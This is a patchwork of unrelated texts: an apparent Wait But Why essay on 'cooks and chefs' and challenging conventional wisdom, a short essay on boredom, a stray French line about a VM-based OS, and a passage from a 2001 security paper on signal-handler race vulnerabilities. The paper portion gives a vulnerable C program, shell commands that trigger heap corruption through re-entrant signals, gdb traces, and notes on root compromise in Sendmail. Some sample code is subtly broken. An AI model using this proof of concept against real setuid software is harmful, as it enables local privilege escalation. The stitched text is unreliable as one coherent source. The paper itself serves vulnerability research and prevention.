Emperor 7Emperor 8Emperor 9Emperor 10Emperor 11Emperor 12Emperor 13
Emperor 13aEmperor 14Emperor 15Emperor 16Emperor 17Emperor 18
Yes, it’s an old classic. The Emperor’s New Clothes. It was written in 1837 by Hans Christian Andersen10 to demonstrate a piece of trademark human insanity: the “This doesn’t seem right to me but everyone else says it’s right so it must be right and I’ll just pretend I also think it’s right so no one realizes I’m stupid” phenomenon.
My favorite all-time quote might be Steve Jobs saying this:
When you grow up, you tend to get told the world is the way it is and your life is just to live your life inside the world. Try not to bash into the walls too much. Try to have a nice family life, have fun, save a little money. That’s a very limited life. Life can be much broader once you discover one simple fact. And that is: Everything around you that you call life was made up by people that were no smarter than you. And you can change it, you can influence it, you can build your own things that other people can use. Once you learn that, you’ll never be the same again.11
This is Jobs’ way of saying, “You might not know shit. But no one knows shit. If the emperor looks naked to you and everyone else is saying he has clothes, trust your eyes since other people don’t know anything you don’t.”
It’s an easy message to understand, a harder one to believe, and an even harder one to act on.
The purpose of the first epiphany is to shatter the belief that all that dogma you’ve memorized constitutes personal opinions and wisdom and all that certainty you feel constitutes knowledge and understanding. That’s the easier one because the delusion that we know what we’re talking about is pretty fragile, with the “Oh god I’m a fraud who doesn’t know shit” monster never lurking too far under our consciousness.
But this epiphany—that the collective “other people” and their conventional wisdom don’t know shit—is a much larger challenge. Our delusion about the wisdom of those around us, our tribe, and society as a whole is much thicker and runs much deeper than the delusion about ourselves. So deep that we’ll see a naked emperor and ignore our own eyes if everyone else says he has clothes on.
This is a battle of two kinds of confidence—confidence in others vs. confidence in ourselves. For most cooks, confidence in others usually comes out the winner.
To swing the balance, we need to figure out how to lose respect for the general public, your tribe’s dogma, and society’s conventional wisdom. We have a bunch of romantic words for the world’s chefs that sound impressive but are actually just a result of them having lost this respect. Being a gamechanger is just having little enough respect for the game that you realize there’s no good reason not to change the rules. Being a trailblazer is just not respecting the beaten path and so deciding to blaze yourself a new one. Being a groundbreaker is just knowing that the ground wasn’t laid by anyone that impressive and so feeling no need to keep it intact.
Not respecting society is totally counterintuitive to what we’re taught when we grow up—but it makes perfect sense if you just look at what your eyes and experience tell you.
There are clues all around showing us that conventional wisdom doesn’t know shit. Conventional wisdom worships the status quo and always assumes that everything is the way it is for a good reason—and history is one long record of status quo dogma being proven wrong again and again, every time some chef comes around and changes things.
And if you open your eyes, there are other clues all through your own life that the society you live in is nothing to be intimidated by. All the times you learn about what really goes on inside a company and find out that it’s totally disorganized and badly run. All the people in high places who can’t seem to get their personal lives together. All the well-known sitcoms whose jokes you’re pretty sure you could have written when you were 14. All the politicians who don’t seem to know more about the world than you.
And yet, the delusion that society knows shit that you don’t runs deep, and still, somewhere in the back of your head, you don’t think it’s realistic that you could ever actually build that company, achieve that fabulous wealth or celebrity-status, create that TV show, win that senate campaign—no matter what it seems like.
Sometimes it takes an actual experience to fully expose society for the shit it doesn’t know. One example from my life is how I slowly came to understand that most Americans—the broader public, my tribe, and people I know well—knew very little about what it’s actually like to visit most countries. I grew up hearing about how dangerous it was to visit really foreign places, especially alone. But when I started going places I wasn’t supposed to go, I kept finding that the conventional wisdom had been plain wrong about it. As I had more experiences and gathered more actual data, I grew increasingly trusting of my own reasoning over whatever Americans were saying. And as my confidence grew, places like Thailand and Spain turned into places like Oman and Uzbekistan which turned into places like Nigeria and North Korea. When it comes to traveling, I had the epiphany: other people’s strong opinions about this are based on unbacked-up dogma and the fact that most people I talk to feel the same way means nothing if my own research, experience, and selective question-asking brings me to a different conclusion.12 When it comes to picking travel destinations, I’ve become a chef.
I try to leverage what I learned as a traveler to transfer the chefness elsewhere—when I find myself discouraged in another part of my life by the warnings and head-shaking of conventional wisdom, I try to remind myself: “These are the same people that were sure that North Korea was dangerous.” It’s hard—you have to take the leap to chefdom separately in each part of your life—but it seems like with each successive cook → chef breakthrough, future breakthroughs become easier to come by. Eventually, you must hit a tipping point and trusting your own software becomes your way of life—and as Jobs says, you’ll never be the same again.
The first epiphany was about shattering a protective shell of arrogance to lay bare a starting point of humility. This second epiphany is about confidence—the confidence to emerge from that humility through a pathway built on first principles instead of by analogy. It’s a confidence that says, “I may not know much, but no one else does either, so I might as well be the most knowledgeable person on Earth.”
Epiphany 3) You’re playing Grand Theft Life
Grand Theft Life
The first two epiphanies allow us to break open our software, identify which parts of it were put there by someone else, and with confidence begin to fill in the Want and Reality boxes with our own handwriting and choose a goal and a strategy that’s right for us.
But then we hit a snag. We’re finally in the lab with all our tools and equipment, but something holds us back. To figure out why, let’s bring back our emperor story.
When the emperor struts out with his shoulder hair and his gut and his little white junk, the story only identifies two kinds of people: the mass of subjects, who all pretend they can see the clothes, and the kid, who just says that the dude is obviously naked.
But I think there’s more going on. In an emperor’s new clothes situation, there are four kinds of people:
1) Proud Cook. Proud Cook is the person drinking the full dogma Kool-Aid. Whatever independent-thinking voice is inside of Proud Cook was silenced long ago, and there’s no distinction between his thoughts and the dogma he follows. As far as he’s concerned, the dogma is truth—but since he doesn’t even register that there’s any dogma happening, Proud Cook simply thinks he’s a very wise person who has it all figured out. He feels the certainty of the dogma running through his veins. When the emperor walks out and proclaims that he is wearing beautiful new clothes, Proud Cook actually sees clothes, because his consciousness isn’t even turned on.
2) Insecure Cook. Insecure Cook is what Proud Cook turns into after undergoing Epiphany #1. Insecure Cook has had a splash of self-awareness—enough to become conscious of the fact that he doesn’t actually know why he’s so certain about the things he’s certain about. Whatever the reasons are, he’s sure they’re right, but he can’t seem to come up with them himself. Without the blissful arrogance of Proud Cook, Insecure Cook is lost in the world, wondering why he’s too dumb to get what everyone else gets and trying to watch others to figure out what he’s supposed to do—all while hoping nobody finds out that he doesn’t get it. When Insecure Cook sees the emperor, his heart sinks—he doesn’t see the clothes, only the straggly gray hears of the emperor’s upper thighs. Ashamed, he reads the crowd and mimics their enthusiasm for the clothes.
3) Self-Loathing Cook. Self-Loathing Cook is what Insecure Cook becomes after being hit by Epiphany #2. Epiphany #2 is the forbidden fruit, and Self-Loathing Cook has bitten it. He now knows exactly why he didn’t feel certain about everything—because it was all bullshit. He sees the tenets of conventional wisdom for what they really are—faith-based dogma. He knows that neither he nor anyone else knows shit and that he’ll get much farther riding his own reasoning than jumping on the bandwagon with the masses. When the emperor emerges, Self-Loathing Cook thinks, “Oh Jesus…this fucktard is actually outside with no clothes on. Oh—oh and my god these idiots are all pretending to see clothes. How is this my life? I need to move.”
But then, right when he’s about to call everyone out on their pretending and the emperor out on his bizarre life decision, there’s a lump in his throat. Sure, he knows there are no clothes on that emperor’s sweaty lower back fat roll—but actually saying that? Out loud? I mean, he’s sure and all—but let’s not go crazy here. Better not to call too much attention to himself. And of course, there’s a chance he’s missing something. Right?
Self-Loathing Cook ends up staying quiet and nodding at the other cooks when they ask him if those clothes aren’t just the most marvelous he’s ever seen.
4) The chef. The kid in the story. The chef is Self-Loathing Cook—except without the irrational fear. The chef goes through the same inner thought process as Self-Loathing Cook, but when it’s time to walk the walk, the chef stands up and yells out the truth.
A visual recap:
4 Subjects
We’re all human and we’re all complex, which means that in various parts of each of our lives, we play each of these four characters.
But to me, Self-Loathing Cook is the most curious one of the four. Self-Loathing Cook gets it. He knows what the chefs know. He’s tantalizingly close to carving out his own chef path in the world, and he knows that if he just goes for it, good things would happen. But he can’t pull the trigger. He built himself a pair of wings he feels confident work just fine, but he can’t bring himself to jump off the cliff.
And as he stands there next to the cliff with the other cooks, he has to endure the torture of watching the chefs of the world leap off the edge with the same exact wings and flying skills he has, but with the courage he can’t seem to find.
To figure out what’s going on with Self-Loathing Cook, let’s remind ourselves how the chefs operate.
Free of Self-Loathing Cook’s trepidation, the world’s chefs are liberated to put on their lab coats and start sciencing. To a chef, the world is one giant laboratory, and their life is one long lab session full of a million experiments. They spend their days puzzling, and society is their game board.
The chef treats his goals and undertakings as experiments whose purpose is as much to learn new information as it is to be ends in themselves. That’s why when I asked Musk what his thoughts were on negative feedback, he answered with this:
I’m a huge believer in taking feedback. I’m trying to create a mental model that’s accurate, and if I have a wrong view on something, or if there’s a nuanced improvement that can be made, I’ll say, “I used to think this one thing that turned out to be wrong—now thank goodness I don’t have that wrong belief.”
To a chef in the lab, negative feedback is a free boost forward in progress, courtesy of someone else. Pure upside.
As for the F word…the word that makes our amygdalae quiver in the moonlight, the great chefs have something to say about that too:
Failure is simply the opportunity to begin again, this time more intelligently. —Henry Ford
Success is going from failure to failure without losing your enthusiasm. —Winston Churchill10
I have not failed 700 times. I’ve succeeded in proving 700 ways how not to build a lightbulb. —Thomas Edison
There’s no more reliable corollary than super-successful people thinking failure is fucking awesome.
But there’s something to that. The science approach is all about learning through testing hypotheses, and hypotheses are built to be disproven, which means that scientists learn through failure. Failure is a critical part of their process.
It makes sense. If there were two scientists trying to come up with a breakthrough in cancer treatment, and the first one is trying every bold thing he can imagine, failing left and right and learning something each time, while the second one is determined not to have any failures so is making sure his experiments are similar to others that have already been proven to work—which scientist would you bet on?
It’s not surprising that so many of the most wildly impactful people seem to treat the world like a lab and their life like an experiment session—that’s the best way to succeed at something.
But for most of us, we just can’t do it. Even poor Self-Loathing Cook, who is so damn close to being a chef—but somehow so far away.
So what’s stopping him? I think two major misconceptions:
Misconception 1: Misplaced Fear
We talked about the chef’s courage actually just being an accurate assessment of risk—and that’s one of the major things Self-Loathing Cook is missing. He thinks he has become wise to the farce of letting dogma dictate your life, but he’s actually in the grasp of dogma’s slickest trick.
Humans are programmed to take potential fear very seriously, and evolution didn’t find it efficient to have us assess and re-assess every fear inside of us. It went instead with the “better safe than sorry” philosophy—i.e. if there’s a chance that a certain fear might be based on real danger, file it away as a real fear, just in case, and even if you confirm later that a fear of yours has no basis, keep it with you, just in case. Better safe than sorry.
And the fear file cabinet is somewhere way down in our psyches—somewhere far below our centers of rationality, out of reach.
The purpose of all of that fear is to make us protect ourselves from danger. The problem for us is that as far as evolution is concerned, danger = something that hurts the chance that your genes will move on—i.e., danger = not mating or dying or your kids dying, and that’s about it.
So in the same way our cook-like qualities were custom-built for survival in tribal times, our obsession with fears of all shapes and sizes may have served us well in Ethiopia 50,000 years ago—but it mostly ruins our lives today.
Because not only does it amp up our fear in general to “shit we botched the hunt now the babies are all going to starve to death this winter” levels even though we live in an “oh no I got laid off now I have to sleep at my parents’ house for two months with a feather pillow in ideal 68º temperature” world—but it also programs us to be terrified of all the wrong things. We’re more afraid of public speaking than texting on the highway, more afraid of approaching an attractive stranger in a bar than marrying the wrong person, more afraid of not being able to afford the same lifestyle as our friends than spending 50 years in meaningless career—all because embarrassment, rejection, and not fitting in really sucked for hunters and gatherers.
This leaves most of us with a skewed danger scale:
Danger Scale
Chefs hate real risk just as much as cooks—a chef that ends up in the Actually Dangerous territory and ends up in jail or in a gutter or in dire financial straits isn’t a chef—he’s a cook living under “I’m invincible” dogma. When we see chefs displaying what looks like incredible courage, they’re usually just in the the Chef Lab. The Chef Lab is where all the action is and where the path to many people’s dreams lies—dreams about their career, about love, about adventure. But even though its doors are always open, most people never set foot in it for the same reason so many Americans never visit some of the world’s most interesting countries—because of an incorrect assumption that it’s a dangerous place. By reasoning by analogy when it comes to what constitutes danger and ending up with a misconception, Self-Loathing Cook is missing out on all the fun.
Misconception 2: Misplaced Identity
The second major problem for Self-Loathing Cook is that, like all cooks, he can’t wrap his head around the fact that he’s the scientist in the lab—not the experiment.
As we established earlier, conscious tribe members reach conclusions, while blind tribe members are conclusions. And what you believe, what you stand for, and what you choose to do each day are conclusions that you’ve drawn. In some cases, very, very publicly.
As far as society is concerned, when you give something a try—on the values front, the fashion front, the religious front, the career front—you’ve branded yourself. And since people like to simplify people in order to make sense of things in their own head, the tribe around you reinforces your brand by putting you in a clearly-labeled, oversimplified box.
What this all amounts to is that it becomes very painful to change. Changing is icky for someone whose identity will have to change along with it. And others don’t make things any easier. Blind tribe members don’t like when other tribe members change—it confuses them, it forces them to readjust the info in their heads, and it threatens the simplicity of their tribal certainty. So attempts to evolve are often met with mockery or anger or opposition.
And when you have a hard time changing, you become attached to who you currently are and what you’re currently doing—so attached that it blurs the distinction between the scientist and the experiment and you forget that they’re two different things.
We talked about why scientists welcome negative feedback about their experiments. But when you are the experiment, negative feedback isn’t a piece of new, helpful information—it’s an insult. And it hurts. And it makes you mad. And because changing feels impossible, there’s not much good that feedback can do anyway—it’s like giving parents negative feedback on the name of their one-month-old child.
We discussed why scientists expect plenty of their experiments to fail. But when you and the experiment are one and the same, not only is taking on a new goal a change of identity, it’s putting your identity on the line. If the experiment fails, you fail. You are a failure. Devastating. Forever.
I talked to Musk about the United States and the way the forefathers reasoned by first principles when they started the country. He said he thought the reason they could do so is that they had a fresh slate to work with. The European countries of that era would have had a much harder time trying to do something like that—because, as he told me, they were “trapped in their own history.”
I’ve heard Musk use this same phrase to describe the big auto and aerospace companies of today. He sees Tesla and SpaceX like the late 18th century USA—fresh new labs ready for experiments—but when he looks at other companies in their industries, he sees an inability to drive their strategies from a clean slate mentality. Referring to the aerospace industry, Musk said, “There’s a tremendous bias against taking risks. Everyone is trying to optimize their ass-covering.”
Being trapped in your history means you don’t know how to change, you’ve forgotten how to innovate, and you’re stuck in the identity box the world has put you in. And you end up being the cancer researcher we mentioned who only tries likely-to-succeed experimentation within the comfort zone he knows best.
It’s for this reason that Steve Jobs looks back on his firing from Apple in 1986 as a blessing in disguise. He said: “Getting fired from Apple was the best thing that could have ever happened to me. The heaviness of being successful was replaced by the lightness of being a beginner again. It freed me to enter one of the most creative periods of my life.” Being fired “freed” Jobs from the shackles of his own history.
So what Self-Loathing Cook has to ask himself is: “Am I trapped in my own history?” As he stands on the cliff with his wings ready for action and finds himself paralyzed—from evolving as a person, from making changes in his life, from trying to do something bold or unusual—is the baggage of his own identity part of what’s holding him back?
Self-Loathing Cook’s beliefs about what’s scary aren’t any more real than Insecure Cook’s assumption that conventional wisdom has all the answers—but unlike the “Other people don’t know shit” epiphany, which you can observe evidence of all over the place, the epiphany that neither failing nor changing is actually a big deal can only be observed by experiencing it for yourself. Which you can only do after you overcome those fears…which only happens if you experience changing and failing and realize that nothing bad happens. Another catch-22.
These are the reasons I believe so many of the world’s most able people are stuck in life as Self-Loathing Cook, one epiphany short of the promised land.
The challenge with this last epiphany is to somehow figure out a way to lose respect for your own fear. That respect is in our wiring, and the only way to weaken it is by defying it and seeing, when nothing bad ends up happening, that most of the fear you’ve been feeling has just been a smoke and mirrors act. Doing something out of your comfort zone and having it turn out okay is an incredibly powerful experience, one that changes you—and each time you have that kind of experience, it chips away at your respect for your brain’s ingrained, irrational fears.
Because the most important thing the chef knows that the cooks don’t is that real life and Grand Theft Auto aren’t actually that different. Grand Theft Auto is a fun video game because it’s a fake world where you can do things with no fear. Drive 200mph on the highway. Break into a building. Run over a prostitute with your car. All good in GTA.
Unlike GTA, in real life, the law is a thing and jail is a thing. But that’s about where the differences end. If someone gave you a perfect simulation of today’s world to play in and told you that it’s all fake with no actual consequences—with the only rules being that you can’t break the law or harm anyone, and you still have to make sure to support your and your family’s basic needs—what would you do? My guess is that most people would do all kinds of things they’d love to do in their real life but wouldn’t dare to try, and that by behaving that way, they’d end up quickly getting a life going in the simulation that’s both far more successful and much truer to themselves than the real life they’re currently living. Removing the fear and the concern with identity or the opinions of others would thrust the person into the not-actually-risky Chef Lab and have them bouncing around all the exhilarating places outside their comfort zone—and their lives would take off. That’s the life irrational fears block us from.
When I look at the amazing chefs of our time, what’s clear is that they’re more or less treating real life as if it’s Grand Theft Life. And doing so gives them superpowers. That’s what I think Steve Jobs meant all the times he said, “Stay hungry. Stay foolish.”
And that’s what this third epiphany is about: fearlessness.
So if we want to think like a scientist more often in life, those are the three key objectives—to be humbler about what we know, more confident about what’s possible, and less afraid of things that don’t matter.
It’s a good plan—but also, ugh. Right? That’s a lot of stuff to try to do.
Usually at the end of a post like this, the major point seems manageable and concrete, and I finish writing it all excited to go be good at shit. But this post was like, “Here’s everything important and go do it.” So how do we work with that?
I think the key is to not try to be a perfect chef or expect that of yourself whatsoever. Because no one’s a perfect chef—not even Elon. And no one’s a pure cook either—nothing’s black and white when you’re talking about an animal species whose brains contain 86 billion neurons. The reality is that we’re all a little of both, and where we are on that spectrum varies in 100 ways, depending on the part of life in question, the stage we’re in of our evolution, and our mood that day.
If we want to improve ourselves and move our way closer to the chef side of the spectrum, we have to remember to remember. We have to remember that we have software, not just hardware. We have to remember that reasoning is a skill and like any skill, you get better at it if you work on it. And we have to remember the cook/chef distinction, so we can notice when we’re being like one or the other.
It’s fitting that this blog is called Wait But Why because the whole thing is a little like the adult version of the Why? game. After emerging from the blur of the arrogance of my early twenties, I began to realize that my software was full of a lot of unfounded certainty and blind assumptions and that I needed to spend some serious time deconstructing—which is the reason that every Wait But Why post, no matter what the topic, tends to start off with the question, “What’s really going on here?”
For me, that question is the springboard into all of this remembering to remember—it’s a hammer that shatters a brittle, protective feeling of certainty and forces me to do the hard work of building a more authentic, more useful set of thoughts about something. Or at least a better-embraced bewilderment.
And when I started learning about Musk in preparation to write these posts, it hit me that he wasn’t just doing awesome things in the world—he was a master at looking at the world, asking “What’s really going on here?” and seeing the real answer. That’s why his story resonated so hard with me and why I dedicated so much Wait But Why time to this series.
But also, Mars. Let’s all go, okay?
Confessing to boredom is confessing to a character-flaw. Popular culture is littered with advice on how to shake it off: find like-minded people, take up a hobby, find a cause and work for it, take up an instrument, read a book, clean your house And certainly don’t let your kids be bored: enroll them in swimming, soccer, dance, church groups – anything to keep them from assuaging their boredom by gravitating toward sex and drugs. To do otherwise is to admit that we’re not engaging with the world around us. Or that your cellphone has died.
But boredom is not tragic. Properly understood, boredom helps us understand time, and ourselves. Unlike fun or work, boredom is not about anything; it is our encounter with pure time as form and content. With ads and screens and handheld devices ubiquitous, we don’t get to have that experience that much anymore. We should teach the young people to feel comfortable with time.
I live and teach in small-town Pennsylvania, and some of my students from bigger cities tell me that they always go home on Fridays because they are bored here.
You know the best antidote to boredom, I asked them? They looked at me expectantly, smartphones dangling from their hands. Think, I told them. Thinking is the best antidote to boredom. I am not kidding, kids. Thinking is the best antidote to boredom. Tell yourself, I am bored. Think about that. Isn’t that interesting? They looked at me incredulously. Thinking is not how they were brought up to handle boredom.
When you’re bored, time moves slowly. The German word for “boredom” expresses this: langeweile, a compound made of “lange,” which means “long,” and “weile” meaning “a while”. And slow-moving time can feel torturous for people who can’t feel peaceful alone with their minds. Learning to do so is why learning to be bored is so crucial. It is a great privilege if you can do this without going to the psychiatrist.
So lean in to boredom, into that intense experience of time untouched by beauty, pleasure, comfort and all other temporal salubrious sensations. Observe it, how your mind responds to boredom, what you feel and think when you get bored. This form of metathinking can help you overcome your boredom, and learn about yourself and the world in the process. If meditating on nothing is too hard at the outset, at the very least you can imitate William Wordsworth and let that host of golden daffodils flash upon your inward eye: emotions recollected in tranquility – that is, reflection – can fill empty hours while teaching you, slowly, how to sit and just be in the present.
Don’t replace boredom with work or fun or habits. Don’t pull out a screen at every idle moment. Boredom is the last privilege of a free mind. The currency with which you barter with folks who will sell you their “habit,” “fun” or “work” is your clear right to practice judgment, discernment and taste. In other words, always trust when boredom speaks to you. Instead of avoiding it, heed its messages, because they’ll keep you true to yourself.
It might be beneficial to think through why something bores you. You will get a whole new angle on things. Hold on to your boredom; you won’t notice how quickly time goes by once you start thinking about the things that bore you.
OS ultra-sécurisé à base de VM (fenêtres toutes dans un workspace, c'est super propre, cf screenshots).
"Delivering Signals for Fun and Profit"
Understanding, exploiting and preventing signal-handling
related vulnerabilities.
Michal Zalewski <lcamtuf@razor.bindview.com>
(C) Copyright 2001 BindView Corporation
According to a popular belief, writing signal handlers has little or nothing
to do with secure programming, as long as handler code itself looks good.
At the same time, there have been discussions on functions that shall be
invoked from handlers, and functions that shall never, ever be used there.
Most Unix systems provide a standarized set of signal-safe library calls.
Few systems have extensive documentation of signal-safe calls - that includes
OpenBSD, Solaris, etc.:
http://www.openbsd.org/cgi-bin/man.cgi?query=sigaction:
"The following functions are either reentrant or not interruptible by sig-
nals and are async-signal safe. Therefore applications may invoke them,
without restriction, from signal-catching functions:
_exit(2), access(2), alarm(3), cfgetispeed(3), cfgetospeed(3),
cfsetispeed(3), cfsetospeed(3), chdir(2), chmod(2), chown(2),
close(2), creat(2), dup(2), dup2(2), execle(2), execve(2),
fcntl(2), fork(2), fpathconf(2), fstat(2), fsync(2), getegid(2),
geteuid(2), getgid(2), getgroups(2), getpgrp(2), getpid(2),
getppid(2), getuid(2), kill(2), link(2), lseek(2), mkdir(2),
mkfifo(2), open(2), pathconf(2), pause(2), pipe(2), raise(3),
read(2), rename(2), rmdir(2), setgid(2), setpgid(2), setsid(2),
setuid(2), sigaction(2), sigaddset(3), sigdelset(3),
sigemptyset(3), sigfillset(3), sigismember(3), signal(3),
sigpending(2), sigprocmask(2), sigsuspend(2), sleep(3), stat(2),
sysconf(3), tcdrain(3), tcflow(3), tcflush(3), tcgetattr(3),
tcgetpgrp(3), tcsendbreak(3), tcsetattr(3), tcsetpgrp(3), time(3),
times(3), umask(2), uname(3), unlink(2), utime(3), wait(2),
waitpid(2), write(2). sigpause(3), sigset(3).
All functions not in the above list are considered to be unsafe with re-
spect to signals. That is to say, the behaviour of such functions when
called from a signal handler is undefined. In general though, signal
handlers should do little more than set a flag; most other actions are
not safe."
It is suggested to take special care when performing any non-atomic
operations while signal delivery is not blocked, and/or not to rely on
internal program state in signal handler. Generally, signal handlers should
do not much more than setting a flag, whenever it is acceptable.
Unfortunately, there were no known, practical security considerations of
such bad coding practices. And while signal can be delivered anywhere
during the userspace execution of given program, most of programmers never
take enough care to avoid potential implications caused by this fact.
Approximately 80 to 90% of signal handlers we have examined were written
in insecure manner.
This paper is an attempt to demonstrate and analyze actual risks caused by
this kind of coding practices, and to discuss threat scenarios that can be
used by an attacker in order to escalate local privileges, or, sometimes,
gain remote access to a machine. This class of vulnerabilities affects
numerous complex setuid programs (Sendmail, screen, pppd, etc.) and
several network daemons (ftpd, httpd and so on).
Thanks to Theo de Raadt for bringing this problem to my attention;
to Przemyslaw Frasunek for remote attack possibilities discussion; Dvorak,
Chris Evans and Pekka Savola for outstanding contribution to heap corruption
attacks field; Gregory Neil Shapiro and Solar Designer for their comments
on the issues discussed below. Additional thanks to Mark Loveless,
Dave Mann, Matt Power and other RAZOR team members for their support and
reviews.
Before we discuss more generalized attack scenarios, I would like to explain
signal handler races starting with very simple and clean example. We would
try to exploit non-atomic signal handler. The following code generalizes, in
simplified way, very common bad coding practice (which is present, for
example, in setuid root Sendmail program up to 8.11.3 and 8.12.0.Beta7):
/*****
void sighndlr(int dummy) {
syslog(LOG_NOTICE,user_dependent_data);
// Initial cleanup code, calling the following somewhere:
free(global_ptr2);
free(global_ptr1);
// 1 *** >> Additional clean-up code - unlink tmp files, etc <<
exit(0);
}
/**
at the beginning of main code. *
**/
signal(SIGHUP,sighndlr);
signal(SIGTERM,sighndlr);
// Other initialization routines, and global pointer
// assignment somewhere in the code (we assume that
// *** nnn is partially user-dependent, yyy does not have to be):
global_ptr1=malloc(nnn);
global_ptr2=malloc(yyy);
// 2 >> further processing, allocated memory <<
// 2 >> is filled with any data, etc... <<
This code seems to be pretty immune to any kind of security compromises. But
this is just an illusion. By delivering one of the signals handled by
sighndlr() function somewhere in the middle of main code execution (marked
as ' 2 ' in above example) code execution would reach handler function.
Let's assume we delivered SIGHUP. Syslog message is written, two pointers are
freed, and some more clean-up is done before exiting ( 1 ).
Now, by quickly delivering another signal - SIGTERM (note that already
delivered signal is masked and would be not delivered, so you cannot
deliver SIGHUP, but there is absolutely nothing against delivering SIGTERM) -
attacker might cause sighndlr() function re-entry. This is a very common
condition - 'shared' handlers are declared for SIGQUIT, SIGTERM, SIGINT,
and so on.
Now, for the purpose of this demonstration, we would like to target heap
structures by exploiting free() and syslog() behavior. It is very important
to understand how [v]syslog() implementation works. We would focus on Linux
glibc code - this function creates a temporary copy of the logged message in
so-called memory-buffer stream, which is dynamically allocated using two
malloc() calls - the first one allocates general stream description
structure, and the other one creates actual buffer, which would contain
logged message.
Please refer the following URL for vsyslog() function sources:
Stream management functions (open_memstream, etc.) can be found at:
In order for this particular attack to be successful, two conditions have
to be met:
syslog() data must be user-dependent (like in Sendmail log messages
describing transferred mail traffic),
second of these two global memory blocks must be aligned the way
that would be re-used in second open_memstream() malloc() call.
The second buffer (global_ptr2) would be free()d during the first
sighndlr() call, so if these conditions are met, the second syslog()
call would re-use this memory and overwrite this area, including
heap-management structures, with user-dependent syslog() buffer.
Of course, this situation is not limited to two global buffers - generally,
we need one out of any number of free()d buffers to be aligned that way.
Additional possibilities are related to interrupting free() chain by precise
SIGTERM delivery and/or influencing buffer sizes / heap data order by
using different input data patterns.
If so, the attacker can cause second free() pass to be called with a pointer
to user-dependent data (syslog buffer), this leads to instant root compromise
see excellent article by Chris Evans (based on observations by Pekka Savola):
Practical discussion and exploit code for the vulnerability discussed in
above article can be found there:
http://security-archive.merton.ox.ac.uk/bugtraq-200010/0084.html
Below is a sample 'vulnerable program' code:
--- vuln.c ---
#include <signal.h>
#include <syslog.h>
#include <string.h>
#include <stdlib.h>
void global1, global2;
char *what;
void sh(int dummy) {
syslog(LOG_NOTICE,"%s\n",what);
free(global2);
free(global1);
sleep(10);
exit(0);
}
int main(int argc,char* argv[]) {
what=argv[1];
global1=strdup(argv[2]);
global2=malloc(340);
signal(SIGHUP,sh);
signal(SIGTERM,sh);
sleep(10);
exit(0);
}
---- EOF ----
You can exploit it, forcing free() to be called on a memory region filled
with 0x41414141 (you can see this value in the registers at the time
of crash -- the bytes represented as 41 in hex are set by the 'A'
input characters in the variable $LOG below). Sample command lines
for a Bash shell are:
$ gcc vuln.c -o vuln
$ PAD=perl -e '{print "x"x410}'
$ LOG=perl -e '{print "A"x100}'
$ ./vuln $LOG $PAD & sleep 1; killall -HUP vuln; sleep 1; killall -TERM vuln
The result should be a segmentation fault followed by nice core dump
(for Linux glibc 2.1.9x and 2.0.7).
(gdb) back
#0 chunk_free (ar_ptr=0x4013dce0, p=0x80499a0) at malloc.c:3069
#1 0x4009b334 in libc_free (mem=0x80499a8) at malloc.c:3043
#2 0x80485b8 in sh ()
#4 0x400d5971 in __libc_nanosleep () from /lib/libc.so.6
#5 0x400d5801 in sleep (seconds=10) at ../sysdeps/unix/sysv/linux/sleep.c:85
#6 0x80485d6 in sh ()
So, as you can see, failure was caused when signal handler was re-entered.
__libf_free function was called with a parameter of 0x080499a8, which points
somewhere in the middle of our AAAs:
(gdb) x/s 0x80499a8
0x80499a8: 'A' <repeats 94 times>, "\n"
You can find 0x41414141 in the registers, as well, showing this data
is being processed. For more analysis, please refer to the paper mentioned
above.
For the description, impact and fix information on Sendmail signal
handling vulnerability, please refer to the RAZOR advisory at:
http://razor.bindview.com/publish/advisories/adv_sm8120.html
Obviously, that is just an example of this attack. Whenever signal handler
execution is non-atomic, attacks of this kind are possible by re-entering
the handler when it is in the middle of performing non-reentrant operations.
Heap damage is the most obvious vector of attack, in this case, but not the
only one.
The attack described above usually requires specific conditions
to be met, and takes advantage of non-atomic signal handler execution,
which can be easily avoided by using additional flags or blocking
signal delivery.
But, as signal can be delivered at any moment (unless explictly blocked),
this is obvious that it is possible to perform an attack without re-entering
the handler itself. It is enough to deliver a signal in a 'not appropriate'
moment. There are two attack schemes:
A) re-entering libc functions:
Every function that is not listed as reentry-safe is a potential source
of vulnerabilities. Indeed, numerous library functions are operating
on global variables, and/or modify global state in non-atomic way.
Once again, heap-management routines are probably the best example.
By delivering a signal when malloc(), free() or any other libcall of
this kind is being called, all subsequent calls to the heap management
routines made from signal handler would have unpredictable effect,
as heap state is completely unpredictable for the programmer.
Other good examples are functions working on static/global variables
and buffers like certain implementations of strtok(), inet_ntoa(),
gethostbyname() and so on. In all cases, results will be unpredictable.
B) interrupting non-atomic modifications:
This is basically the same problem, but outside library functions.
For example, the following code:
dropped_privileges = 1;
setuid(getuid());
is, technically speaking, using safe library functions only. But,
at the same time, it is possible to interrupt execution between
substitution and setuid() call, causing signal handler to be executed
with dropped_privileges flag set, but superuser privileges not dropped.
This, very often, might be a source of serious problems.
First of all, we would like to come back to Sendmail example, to
demonstrate potential consequences of re-entering libc. Note that signal
handler is NOT re-entered - signal is delivered only once:
#0 0x401705bc in chunk_free (ar_ptr=0x40212ce0, p=0x810f900) at malloc.c:3117 #1 0x4016fd12 in chunk_alloc (ar_ptr=0x40212ce0, nb=8200) at malloc.c:2601
#2 0x4016f7e6 in __libc_malloc (bytes=8192) at malloc.c:2703
#3 0x40168a27 in open_memstream (bufloc=0xbfff97bc, sizeloc=0xbfff97c0) at memstream.c:112
#4 0x401cf4fa in vsyslog (pri=6, fmt=0x80a5e03 "%s: %s", ap=0xbfff99ac) at syslog.c:142
#5 0x401cf447 in syslog (pri=6, fmt=0x80a5e03 "%s: %s") at syslog.c:102
#6 0x8055f64 in sm_syslog ()
#7 0x806793c in logsender ()
#8 0x8063902 in dropenvelope ()
#9 0x804e717 in finis ()
#10 0x804e9d8 in intsig () <---- SIGINT
#11 <signal handler called>
#12 chunk_alloc (ar_ptr=0x40212ce0, nb=4104) at malloc.c:2968
#13 0x4016f7e6 in __libc_malloc (bytes=4097) at malloc.c:2703
Heap corruption is caused by interruped malloc() call and, later, by
calling malloc() once again from vsyslog() function invoked from handler.
There are two another examples of very interesting stack corruption caused by
re-entering heap management routines in Sendmail daemon - in both cases,
signal was delivered only once:
A)
#0 0x401705bc in chunk_free (ar_ptr=0xdbdbdbdb, p=0x810b8e8) at malloc.c:3117
#1 0xdbdbdbdb in ?? ()
B)
/.../
#9 0x79f68510 in ?? ()
Cannot access memory at address 0xc483c689
We'd like to leave this one as an exercise for a reader - try to figure
out why this happens and why this problem can be exploitable. For now,
we would like to come back to our second scenario, interrupting non-atomic
code to show that targeting heap is not the only possibility.
